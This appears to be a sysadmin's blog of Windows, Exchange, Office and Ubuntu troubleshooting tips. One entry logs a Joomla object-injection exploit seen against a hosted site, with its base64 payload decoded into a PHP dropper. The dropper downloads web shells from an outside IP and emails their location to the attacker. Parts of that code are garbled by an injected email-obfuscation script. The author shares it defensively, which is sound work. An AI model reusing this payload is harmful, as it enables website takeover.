• this will go through a process of showing previous points in time. You can choose one of these points. Your system files will go back to that time, removing any updates, patches or changes. Your document files will remain as they are now.
• -let it go through its process and restart.

ISSUE 4 - safe-mode or low-resolution video
• -click TROUBLESHOOT.
• -click STARTUP-SETTINGS
• -the computer will reboot and give the options to press F1 through F9
• -press F3 to try low-resolution video, as sometimes Windows 10 suddenly doesn't like the video drivers.
• -or press F5 to try to get to safe-mode-with-networking.

ISSUE 5 - sfc
• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: sfc /scannow
• -let it go through its process and restart.

ISSUE 6 - windowsapps folder
For some reason the "windowsapps" folder gets messed up during an update or during system-restore (message about "appxstaging"):
• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: takeown /f "C:\Program Files\WindowsApps" /r /d Y
• -type: icacls "C:\Program Files\WindowsApps" /grant administrator:F /t
• -type: rd /s "C:\Program Files\WindowsApps"
• -reboot and see if that works.
ISSUE 7 - There is a registry error.
• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: d: (hit enter)
• -type: cd windows (hit enter)
• -type: cd system32 (hit enter)
• -type: cd config (hit enter)
• -type: ren default default1 (hit enter)
• -type: ren sam sam1 (hit enter)
• -type: ren software software1 (hit enter)
• -type: ren security security1 (hit enter)
• -type: ren system system1 (hit enter)
• -type: cd regback (hit enter)
• -type: copy * ..\ (hit enter)
• (that is: copy-space-asterisk-space-dot-dot-backslash)
• -type: exit
• -let it reboot and see if that works.

ISSUE 8 - There is a boot problem.
• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: bootrec.exe /fixmbr
• -type: bootrec.exe /fixboot
• -type: bootrec.exe /RebuildBcd
• -type: exit
• -let it reboot and see if that works.

ISSUE 9 - dism
This is the only issue that I have not tried personally, as I've never had to get this far. The idea is that there is something wrong with Windows and that it can be repaired:
• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: dism /online /cleanup-image /scanhealth
• -type: dism /online /cleanup-image /restorehealth
• -let it go through its process and restart.

ISSUE 10 - reload and transfer
If I've gone through the 9 issues above without success, I throw in the towel and reload Windows 10 on a new hard drive (ssd) and transfer the data. Not ideal, but usually by this point reloading and transferring the data is going to be faster than further troubleshooting.

Those are the 10 issues that I go through when I get "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop.

1-3-2 Bios Beeps Dell Precision T3500

Dell Precision T3500 boots fine. Upon reboot, the system bios beeps: 1-3-2. In other words, beep (pause) beep-beep-beep (pause) beep-beep. Nothing. No bios. Just black screen. The only way to get it to reboot properly without the bios beeps is to yank the power from the computer.
Wait till the electricity discharges from the motherboard by holding in the power button. Plug the system back into the power. Press the power button.

But here's how to fix:
• -reset to defaults.
• -turn off the FAST BOOT.
• -disable the DISKETTE DRIVE.
• -uncheck the ONBOARD OR USB FLOPPY DRIVE.
• -uncheck the ONBOARD OR USB CD DRIVE.

While we are at it, change the silly default options:
• -disable LOW-POWER-MODE.
• -enable HYPER-THREADING (if you have it).
• -enable MULTICORE.
• -enable TURBOBOOST.
• -disable SPEEDSTEP.
• -enable SMART TEST.

There could be other reasons. For me, this was what worked. The key seemed to be something in the FASTBOOT and the DISKETTE DRIVE.

NOTES:
• -this was a 6 month process :-(
• -replacing the 525W power supply with an 850W power supply didn't work.

WINDOWS 10 Falls Asleep After 2 Minutes

MANUAL EDIT:
01 -click START > RUN > CMD (or POWERSHELL) (as administrator)
02 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\7bc4a2f9-d8fc-4469-b07b-33eb785aaca0" /v Attributes /t REG_DWORD /d 2
03 -enter
04 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\2a737441-1930-4402-8d77-b2bebba308a3\d4e98f31-5ffe-4ce1-be31-1b38b384c009" /v Attributes /t REG_DWORD /d 2
05 -enter
06 -click START > CONTROL-PANEL > POWER-OPTIONS > CHANGE-THE-PLAN-SETTINGS > click on "Change advanced power settings".
07 -click on "Change settings that are currently unavailable"
08 -click Sleep > System unattended sleep timeout > type 0
09 -click USB-SETTINGS > USB-3-LINK-POWER-MANAGEMENT > set to OFF
10 -click OK
11 That's it!!! You did it!!!

OFFICE 2013 ACTIVATION

I'm not an expert on ACTIVATION, as LICENSING is a pain. Luckily, I'm in a corporate situation where budgets are secondary to getting it working. KMS & MAK are not covered here.
Here's how:
• -click START > RUN
• -type: cmd
• -type: cd C:\Program Files\Microsoft Office\Office15

From here, there are 3 basic commands to help and resolve: STATUS, CHANGE, ACTIVATE.

GET STATUS
• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus

CHANGE KEY
• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

ACTIVATE KEY
• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act

The result will look something like this:

RESULT
Microsoft (R) Windows Script Host Version 5.812
---Processing--------------------------
---------------------------------------
SKU ID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
LICENSE NAME: Office 15, OfficeStandardVL_MAK edition
LICENSE DESCRIPTION: Office 15, RETAIL(MAK) channel
Last 5 characters of installed product key: XXXXX
---------------------------------------
---------------------------------------
---Exiting-----------------------------

Sometimes there is a double install, where 2 different versions are installed at the same time: a KMS version and a MAK version. You can find out by:

SEE ALL KEYS THAT ARE TRYING TO ACTIVATE
• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus

UNINSTALL THE KEY THAT ISN'T CORRECT
• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /unpkey:last-5-digits

THEN IMMEDIATELY INSTALL A MAK KEY
• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

THEN ACTIVATE
• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act

Windows 10 ISO

To be clear, you can do a CLEAN INSTALL of WINDOWS 10 if you have WINDOWS 7 or WINDOWS 8 or WINDOWS 8.1, until the end of JULY 2016. To do so, you need a WINDOWS 10 USB. This is easily obtained by using the WINDOWS 10 MEDIA CREATION TOOL (MCT) here:

Now you have a bootable USB disk. But what if you want to create a multiple-boot USB disk where WINDOWS 10 is just one of the options?
You would somehow have to create a WINDOWS 10 ISO. I enjoy the E2B project. Despite being wordy and looking complicated, it's actually fairly simple. Here's the shortcut.
• -click MAKE_E2B_USB_DRIVE (run as admin) (CAUTION!!! This will delete everything on the USB drive.)
• -install your ISO/IMG/IMGPTN in the appropriate place.

Now to the part where we need a WINDOWS ISO. To be fair, you can get a WINDOWS 10 ISO in 2 ways.

FIRST WAY TO GET WINDOWS 10 ISO
• -open CHROME
• -click SETTINGS (at the upper right) > MORE-TOOLS > DEVELOPER-TOOLS
• -a window opens on the right-hand side.
• -click the TOGGLE-DEVICE-TOOLBAR icon (at the top of the right-hand side).
• (It is the second one from the left.)
• -you will see 4 options
WINDOWS 10 (all languages)
WINDOWS 10 K (Korean law)
WINDOWS 10 N (European law)
WINDOWS 10 SINGLE LANGUAGE (1 language only)
• -simply download the one you want (probably WINDOWS 10 ALL LANGUAGES)

For me, doing this somehow downloaded the ISO as a WINDOWS 10 HOME version. It doesn't matter, it will still install WINDOWS 10 PRO. But I would like the INSTALL.ESD to say WINDOWS 10 PRO. I do not know yet if it matters.

NOTE: If you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having come from trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE ISO when they have WINDOWS 7 ALL LANGUAGES installed on their machine.

SECOND WAY TO GET WINDOWS 10 ISO

So you have a bootable USB to install WINDOWS 10. You want to turn that into an ISO. How do you do it? You don't turn it into an ISO. You turn it into an IMG (more specifically, an imgPTN file). I won't go into details, but you can't easily turn an entire bootable USB into an ISO. There are too many variables. But you can turn a bootable USB partition into a bootable partition image, hence imgPTN. Here's how to turn it into a BOOTABLE IMG.
• http://files.easy2boot.com/200001685-7c24a7e1e7/MPI_Tool_Pack_Plus_CloverLite_065.zip
• -unzip it.
• -open the ImDisk\imdiskinst.exe file and run it to install the driver.
• -plug in your BOOTABLE USB drive.
• -the computer will assign a drive letter (for example, DRIVE G).
• -drag the USB DRIVE LETTER onto the MAKEPARTIMAGE shortcut.
• -it will create an image of the USB drive.
• -wait.
• -put the IMG in the appropriate folder (probably G:\_ISO\WINDOWS\WIN10\).
• -click MAKE_THIS_DRIVE_CONTIGUOUS

That's it!!!! You've done it.

Creating Resource Rooms in Exchange 2013

Creating resource rooms in EXCHANGE 2013 can be complicated, as the GUI doesn't work in a straightforward manner. Here's how I did it:
• New-Mailbox -Database "Mailbox-FOO" -Name conference.downstairs -DisplayName "Conference Downstairs" -Room
• Set-MailboxFolderPermission conference.downstairs:\Calendar -User Default -AccessRights Reviewer
• Set-CalendarProcessing conference.downstairs -AutomateProcessing AutoAccept

This will allow users to set an appointment with the ROOM as the LOCATION, but will only allow the ORGANIZER to adjust the appointment (rather than letting anyone change the appointment).

Hacking Attempt 16-06

Here's another hacking attempt on another hosted web site. This attempt is from: 74.208.47.52, which was resolving to catchmeapp.com

NOTE: Often the hacking web site is not the perpetrator and is hacked itself. This makes it hard to discover the real hacker.
========================== GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimp lepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_u rl\";s:3810:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7 DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRz l3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFj bXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSn VJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5 OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0ME55NDFNaTluWlhRdlkzTnpMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1 kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNS amFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNpUmphR1ZqYXpJZ1BTQWtYMU5GVWxaRlVsc25SRTlEVl xzWlY5bGVHbHpkSE1vSkdOb1pXTnJNaWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTWk0aVBDOWljajRpT3cwS2ZXVnNjMlVnRFFvZ0lHVmphRzhnSW01dmRDQmxlR2wwY3pJaU93MEtaV05vYnlBaVpHOXVa VElnTGx4dUlDSWdPdzBLRFFva1kyaGxZMnN6UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwzY3VhSFJ0SWlBN0RRb2tkR1Y0ZERNZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6Yz 
BMakl3T0M0ME55NDFNaTluWlhRdmR5NTBlSFFuS1RzTkNpUnZjRE05Wm05d1pXNG9KR05vWldOck15d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQXpMQ1IwWlhoME15azdEUXBtWTJ4dmMyVW9KRzl3TXlrN0RR tDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5akxuUjRkQ2NwT3cwS0pHOXdORDFtYjNCbGJpZ2tZMmhsWTJzMExDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEUXNKSFJsZUhRMEtUc05DbVpqYkc5 elpTZ2tiM0EwS1RzTkNnMEtKR05vWldOck5UMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTl WlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRb05DaVJqYUdWamF6WTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxZFhObGNpNXdhSE bmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0puWVdKaWVTNWpZWE5vUUhsaGJtUmxlQzVqYjIwc2IyeHZhbVZ6YUdGcllYSmhRR2R0WVdsc0xtTn ZiU0k3RFFva2MzVmlhbVZqZENBOUlDZEtiMjBnZW5wNklDY2dMaUFrWDFORlVsWkZVbHNuVTBWU1ZrVlNYMDVCVFVVblhUc05DaVJvWldGa1pYSWdQU0FuWm5KdmJUb2dTMlZyYTJGcElGTmxibk5sYmlBOGRt OXVVbVZwYm1obGNucExiR0YxYzBCVFlXbHJiM1Z1WVVocFlta3VZMjl0UGljZ0xpQWlYSEpjYmlJN0RRb2tiV1Z6YzJGblpTQTlJQ0pUYUdWc2JIb2dPaUJvZEhSd09pOHZJaUF1SUNSZlUwVlNWa1ZTV3lkVF JWSldSVkpmVGtGTlJTZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmFtOXZiV3hoTDJwdFlXbHNMbkJvY0Q5MUlpQXVJQ0pjY2x4dUlpQXVJSEJvY0Y5MWJtRnRaU2dwSUM0Z0lseHlYRzRpT3cwS0pITmxiblJ0WVds c0lEMGdRRzFoYVd3b0pIUnZlaXdnSkhOMVltcGxZM1FzSUNSdFpYTnpZV2RsTENBa2FHVmhaR1Z5S1RzTkNnMEtRSFZ1YkdsdWF5aGZYMFpKVEVWZlh5azdEUW9OQ2cwS1B6ND0nKSk7DQpmY2xvc2UoJGZwKT s='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s :4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd" =============================================== This translates into: =============================================== $check =$_SERVER['DOCUMENT_ROOT'] . 
"/libraries/joomla/lol.php" ; $fp=fopen("$check","w+"); fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvY3NzLnR4dCcpOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly83NC4yMDguNDcuNTIvZ2V0L20udHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3cuaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvdy50eHQnKTsNCiRvcDM9Zm9wZW4oJGNoZWNrMywgJ3cnKTsNCmZ3cml0ZSgkb3AzLCR0ZXh0Myk7DQpmY2xvc2UoJG9wMyk7DQoNCiRjaGVjazQ9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9jaGVjay5waHAiIDsNCiR0ZXh0NCA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9jLnR4dCcpOw0KJG9wND1mb3BlbigkY2hlY2s0LCAndycpOw0KZndyaXRlKCRvcDQsJHRleHQ0KTsNCmZjbG9zZSgkb3A0KTsNCg0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9tbS50eHQnKTsNCiRvcDU9Zm9wZW4oJGNoZWNrNSwgJ3cnKTsNCmZ3cml0ZSgkb3A1LCR0ZXh0NSk7DQpmY2xvc2UoJG9wNSk7DQoNCiRjaGVjazY9JF9TRV
JWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qdXNlci5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC91c2VyLnR4dCcpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICJnYWJieS5jYXNoQHlhbmRleC5jb20sb2xvamVzaGFrYXJhQGdtYWlsLmNvbSI7DQokc3ViamVjdCA9ICdKb20genp6ICcgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXTsNCiRoZWFkZXIgPSAnZnJvbTogS2Vra2FpIFNlbnNlbiA8dm9uUmVpbmhlcnpLbGF1c0BTYWlrb3VuYUhpYmkuY29tPicgLiAiXHJcbiI7DQokbWVzc2FnZSA9ICJTaGVsbHogOiBodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocD91IiAuICJcclxuIiAuIHBocF91bmFtZSgpIC4gIlxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWwoJHRveiwgJHN1YmplY3QsICRtZXNzYWdlLCAkaGVhZGVyKTsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQoNCg0KPz4=')); fclose($fp); ================================================ Which further is decoded to: ================================================ <?php function http_get($url){$im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); }$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;$text = http_get('http://74.208.47.52/get/css.txt'); $open = fopen($check, 'w'); fwrite($open,$text); fclose($open); if(file_exists($check)){ echo $check."</br>"; }else echo "not exits"; echo "done .\n " ;$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;$text2 = http_get('http://74.208.47.52/get/m.txt'); $open2 = fopen($check2, 'w'); fwrite($open2,$text2); fclose($open2); if(file_exists($check2)){ echo $check2."</br>"; }else echo "not exits2"; echo "done2 .\n " ;$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;$text3 = http_get('http://74.208.47.52/get/w.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3);$check4=$_SERVER['DOCUMENT_ROOT'] . 
"/libraries/joomla/check.php" ;$text4 = http_get('http://74.208.47.52/get/c.txt'); $op4=fopen($check4, 'w'); fwrite($op4,$text4); fclose($op4);$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;$text5 = http_get('http://74.208.47.52/get/mm.txt'); $op5=fopen($check5, 'w'); fwrite($op5,$text5); fclose($op5);$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;$text6 = http_get('http://74.208.47.52/get/user.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6);$toz = " This e-mail address is being protected from spambots. You need JavaScript enabled to view it , This e-mail address is being protected from spambots. You need JavaScript enabled to view it "; $subject = 'Jom zzz ' .$_SERVER['SERVER_NAME']; $header = 'from: Kekkai Sensen < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >'; document.write( '' ); document.write( addy_text83189 ); document.write( '<\/a>' ); //--> This e-mail address is being protected from spambots. You need JavaScript enabled to view it ;' . "\r\n";$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";$sentmail = @mail($toz,$subject, $message,$header); ?> =============================================== Nice try... but not this time. Hacking Attempt 16-05 Here's a recent hacking attempt into a hosted web site. The hacking attempt is from webmeup-crawler.com ============================= ============================== This translates into: ============================== <script type='text/javascript'> <!-- var prefix = 'ma'   'il'   'to'; var path = 'hr'   'ef'   '='; var addy64466 = 'PetersHyland'   '@'; addy64466 = addy64466   'ipre'   '.'   
'com'; document.write('<a '   path   '\''   prefix   ':'   addy64466   '\'>'); document.write(addy64466); document.write('<\/a>'); /-->\n </script><script type='text/javascript'> <!-- document.write('<span style=\'display: none;\'>'); /--> </script>This email address is being protected from spambots. You need JavaScript enabled to view it. <script type='text/javascript'> <!-- document.write('</'); document.write('span>'); /--> </script> ============================== This was repeated in a brute force attack, changing the password for every attemtp. Nice one... but not this time. Clean Install Windows 10 Clean installing Windows 10 can be a pain. There's too many gotchas that it can be frustrating. Here's how I did it: • -after your have created the USB, check to make sure you have the right BUILD NUMBER (see other article post). • -SKIP PRODUCT KEY DURING INSTALL (OR "Do This Later or I Don't Have a Key"). Save the activation after install with your Windows 7, 8 or 8.1 Product Key, even if embedded in BIOS. (NOTE: this is in contrast to the WINDOWS 8 that requires to NOT select "I don't have a product key" as activation will not be successful. ) Find Windows 10 ISO Version or Build Number Finding the Windows 10 ISO version or Build Number is important because builds starting in November 2015 and newer allow you to clean install Windows 10 if you have Windows 7 or Windows 8. • -mount the ISO to expose the files. This can be done through Windows 10, if you have another computer available or through VirtualCD. • -find where the "install.wim" (or install.esd) is. For example; F:\sources\install.wim • -open CMD • -type: dism /Get-WimInfo /WimFile:F:\sources\install.wim /index:1 • -or if Windows 10 install.esd file, type: dism /Get-WimInfo /WimFile:F:\sources\install.esd /index:1 This will show the details of the INSTALL.WIM file. 
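If you want to pull those details out programmatically, dism's output is simple "Name : Value" lines. A hypothetical parser — the sample text below is a stand-in, not captured dism output:

```python
# Hypothetical parser for "dism /Get-WimInfo" style output; the sample
# below is a stand-in, not real captured output.
sample = """Index : 1
Name : Windows 10 Pro
Description : Windows 10 Pro
Architecture : x64
Version : 10.0.10586
"""

def wim_fields(text):
    fields = {}
    for line in text.splitlines():
        if " : " in line:
            key, _, value = line.partition(" : ")
            fields[key.strip()] = value.strip()
    return fields

info = wim_fields(sample)
print(info["Version"])  # 10.0.10586
```

Build 10586 is the November 2015 build, i.e. the first one that will take a Windows 7/8 key for a clean install.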
NOTE: in some cases, Windows 7 will not be able to read a Windows 10 install.esd file :-(

Re-enable Mailbox in Exchange 2013

If you disable a MAILBOX in EXCHANGE, the account is available for 30 days by default. However, if you disable a MAILBOX in EXCHANGE and you disable the AD account, the MAILBOX will not show as a disconnected MAILBOX. Here's how to get it back on demand.

First, check the RETENTION settings of the MAILBOXDATABASE:
$Get-MailboxDatabase "Mailbox-Database-Name-Here" | fl | grep MailboxRetention

Now, let's make sure that the MAILBOX is still in the MAILBOXDATABASE:
$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here"

You will see all the accounts. Once you see the account that you want back, you will need the full DISPLAY NAME of the account:
$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" | fl | grep -i any-part-of-account-name-here

Lastly, let's reconnect the MAILBOX and connect it to an ACCOUNT:
$Get-MailboxDatabase -Identity "Mailbox-Database-Name-Here" | Get-MailboxStatistics | Where { $_.Displayname -eq "full-display-name-here" } | Connect-Mailbox -User "username-here"

Windows 8/8.1/10 Product Keys

SITUATION
You have a new computer and you test out Linux, destroying everything on the hard drive. You go to reinstall Windows and you realize that you do not have the PRODUCT KEY. There is no label on the side/back/inside of the pc. You have an OEM Windows 8.1 disk. The pc does not have a DVD drive.

RESOLUTION
Find a pc that has a DVD drive.

1-create an ISO with 7ZIP.
• -select the DVD DRIVE.
• -click VIEW (at the top).
• -click OPEN ROOT FOLDER.
• -click VIEW (at the top).
• -click UP ONE LEVEL.
• -in the main window you will see: \\. (backslash, backslash, dot).
• -double-click \\.
• -select the DVD drive.
• -click FILE > COPY-TO (at the top)
• -select the folder where you want the ISO to go.

2-copy that ISO to your EASY2BOOT USB.
• -easy squeezy.

NOTE: if you do not have one, get one. It's super easy.
Run tool. Have USB.

3-install WINDOWS.
• -the install should use the PRODUCT KEY from the UEFI (or, in layman's terms, the BIOS).
• -if you are being prompted for a product key, it means that you have the wrong installation media; that's when the Windows 8.1/10 installer can't detect the Windows 8/8.1 product key from the UEFI firmware (BIOS).
• -it will prompt which version to install: WINDOWS 8.1, WINDOWS 8.1 CORE, WINDOWS 8.1 SINGLE LANGUAGE (same as PRO), WINDOWS 8.1 PRO
• -do NOT select "I don't have a product key". Activation will not be successful.

4-find the WINDOWS PRODUCT KEY in the UEFI.
• -open the tool.
• -click ACPI (at the top).
• -click the MSDM tab (towards the top)
• -look at the last line; it is the embedded PRODUCT KEY ;-)

There are other ways to do this, such as:
• -open COMMAND PROMPT.
• -type: WMIC Path SoftwareLicensingService Get OA3xOriginalProductKey

As well as other ways.

Wrong Time on Ubuntu - NTP

SCENARIO
Fresh install of Ubuntu. Wrong time. A day later, still wrong time.

HOW TO FIX THE WRONG TIME ON UBUNTU
• -edit /etc/ntp.conf
• -comment out the "pool" servers.
• -comment out the fallback "pool" server.
• -type: server 192.168.1.1 (or a local server/router/switch that can provide NTP services)
• -save
• -stop the service: /etc/init.d/ntp stop
• -start the service: /etc/init.d/ntp start

This may happen for various reasons. For me, a high-end firewall was blocking outside NTP servers from talking on port 123.

NOTES: do not use/install the ntpdate package; it is deprecated.

Digital Watchdog Spectrum Client on Ubuntu 16.04 LTS

Getting the Digital Watchdog Spectrum Client onto Ubuntu 16.04 LTS can be not-so-straightforward, especially if you are not from the Linux world.

TO INSTALL:
• open TERMINAL
• type: sudo dpkg -i digitalwatchdog-client-2.4.1.10278-x64-release.deb
• (NOTE: do not just double-click on the file. Do not install with UBUNTU SOFTWARE MANAGER).
• go through the setup process.

On UBUNTU 14.04, you are finished.
On UBUNTU 16.04, you need the following:
• type: sudo apt-get install libgstreamer-plugins-base0.10-dev

That's it! You should now be able to use the Digital Watchdog Spectrum client.

Testing HD with Smartctl & Finding the Filesystem

Hmmm. Something is wrong with SDA. Let's test it:

# smartctl -t short /dev/sda

And look at the results:

# smartctl -a /dev/sda

The last self-test result in the log shows:

Error: UNC 8 sectors at LBA = 0x00384622 = 3687970
SMART Self-test log structure revision number 1
